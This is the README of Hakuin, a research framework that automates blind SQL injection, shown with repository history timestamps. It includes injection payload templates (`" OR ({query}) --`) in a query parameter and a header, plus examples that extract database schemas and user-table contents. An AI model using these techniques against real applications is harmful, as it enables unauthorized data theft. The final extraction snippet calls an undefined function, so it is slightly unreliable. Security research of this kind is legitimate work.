1
0
mirror of https://github.com/pruzko/hakuin synced 2024-11-08 13:59:15 +01:00
hakuin/README.md

127 lines
4.6 KiB
Markdown
Raw Normal View History

2023-09-03 09:22:35 +02:00
<p align="center">
<img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
</p>
Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.
2023-09-04 09:55:00 +02:00
Hakuin been presented at academic and industrial conferences:
2023-09-04 04:40:27 +02:00
- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
- [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023
2023-09-04 09:56:03 +02:00
Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
2022-08-15 04:51:48 +02:00
2023-03-23 08:53:36 +01:00
## Installation
To install Hakuin, simply run:
```
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip install .
```
Developers should set the `-e` flag to install the framework in editable mode:
```bash
pip install -e .
2023-03-23 08:53:36 +01:00
```
2022-08-15 04:51:48 +02:00
2023-03-23 08:53:36 +01:00
## Examples
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the `Requester` and override the `request` method. Also, the method must determine whether the query resolved to `True` or `False`.
##### Example 1 - Query Parameter Injection with Status-based Inference
```python
2023-03-23 08:53:36 +01:00
import requests
from hakuin import Requester
class StatusRequester(Requester):
def request(self, ctx, query):
r = requests.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
2023-03-23 08:53:36 +01:00
return r.status_code == 200
```
2023-03-23 08:53:36 +01:00
##### Example 2 - Header Injection with Content-based Inference
```python
2023-03-23 08:53:36 +01:00
class ContentRequester(Requester):
def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
2023-03-23 08:53:36 +01:00
r = requests.get(f'http://vuln.com/', headers=headers)
return 'found' in r.content.decode()
```
2023-09-05 03:29:55 +02:00
To start infering data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
2023-03-23 08:53:36 +01:00
##### Example 1 - Inferring SQLite DBs
```python
2023-03-23 08:53:36 +01:00
from hakuin.dbms import SQLite
2023-09-05 03:29:55 +02:00
from hakuin import Extractor, Requester
2023-03-23 08:53:36 +01:00
class StatusRequester(Requester):
...
2023-09-05 03:29:55 +02:00
exf = Extractor(requester=StatusRequester(), dbms=SQLite())
2023-03-23 08:53:36 +01:00
```
##### Example 2 - Inferring MySQL DBs
```python
from hakuin.dbms import MySQL
...
2023-09-05 03:29:55 +02:00
exf = Extractor(requester=StatusRequester(), dbms=MySQL())
2023-03-23 08:53:36 +01:00
```
Now that eveything is set, you can start inferring DB schemas.
##### Example 1 - Inferring DB Schemas
```python
2023-09-05 03:29:55 +02:00
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained models
schema = exf.extract_schema(strategy='model')
2023-03-23 08:53:36 +01:00
```
##### Example 2 - Inferring DB Schemas with Metadata
```python
# metadata:
# True: Detect column settings (data type, nullable, primary key)
# False: Pass
2023-09-05 03:29:55 +02:00
schema = exf.extract_schema(strategy='model', metadata=True)
```
2023-03-23 08:53:36 +01:00
##### Example 3 - Inferring only Table/Column Names
```python
2023-09-05 03:29:55 +02:00
tables = exf.extract_table_names(strategy='model')
columns = exf.extract_column_names(table='users', strategy='model')
2023-03-23 08:53:36 +01:00
```
Once you know the schema, you can extract the actual content.
##### Example 1 - Inferring Textual Columns
```python
2023-09-05 03:29:55 +02:00
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'):
2023-03-23 08:53:36 +01:00
```
More examples can be found in the `tests` directory.
2023-03-23 08:53:36 +01:00
## For Researchers
This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
#### Cite Hakuin
```
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
```